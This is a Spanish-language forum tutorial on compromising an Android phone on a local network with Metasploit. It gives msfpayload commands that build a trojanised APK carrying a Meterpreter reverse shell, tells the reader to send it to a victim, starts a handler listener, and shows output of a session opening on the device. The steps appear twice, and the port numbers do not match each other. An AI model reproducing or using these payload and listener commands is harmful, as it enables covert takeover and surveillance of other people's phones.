Hoy les mostrare como hackear un android que se encuentre en una red local usando Metasploit en BackTrack 5
1.) Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.
2.) Una vez hecho eso pondremos en Metasploit lo siguiente....
Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada
Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit
por qué pongo "R" si siempre se crea el ejecutable con "X" , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk
Bueno una vez hecho eso, cargamos el exploit ......
Bueno ahora la victima cuando instale la Apk, infectada nos saldrá esto....
Ya que tenemos la sesión en meterpreter escrbimos "help" para ver los comando que nos da meterpreter para este dispositvo
Espero les guste
1.) Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.
2.) Una vez hecho eso pondremos en Metasploit lo siguiente....
Código [Seleccionar]
search Android
Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada
Código [Seleccionar]
sudo msfpayload android/meterpreter/reverse_tcp LHOST="Tu ip" LPORT=Puerto R > "Ruta+ Aplicación.apk
Ejemplo :
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=23 R > /root/Desktop/Hack.apk
Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit
por qué pongo "R" si siempre se crea el ejecutable con "X" , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk
Bueno una vez hecho eso, cargamos el exploit ......
Código [Seleccionar]
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST="Su ip puesta en el backdoor" LPORT="Su puerto" E
Ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E
Bueno ahora la victima cuando instale la Apk, infectada nos saldrá esto....
Código [Seleccionar]
=[ metasploit v4.7.0-1 [core:4.7 api:1.0]
+ -- --=[ 1141 exploits - 720 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
PAYLOAD=> android/meterpreter/reverse_tcp
LHOST=> 192.168.1.35
[*] Started reverse handler on 192.168.1.35:4444
[*] Starting the payload handler...
[*] Sending stage (39698 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.34:40715) at 2014-01-10 05:02:51 +0200
meterpreter >
Ya que tenemos la sesión en meterpreter escrbimos "help" para ver los comando que nos da meterpreter para este dispositvo
Espero les guste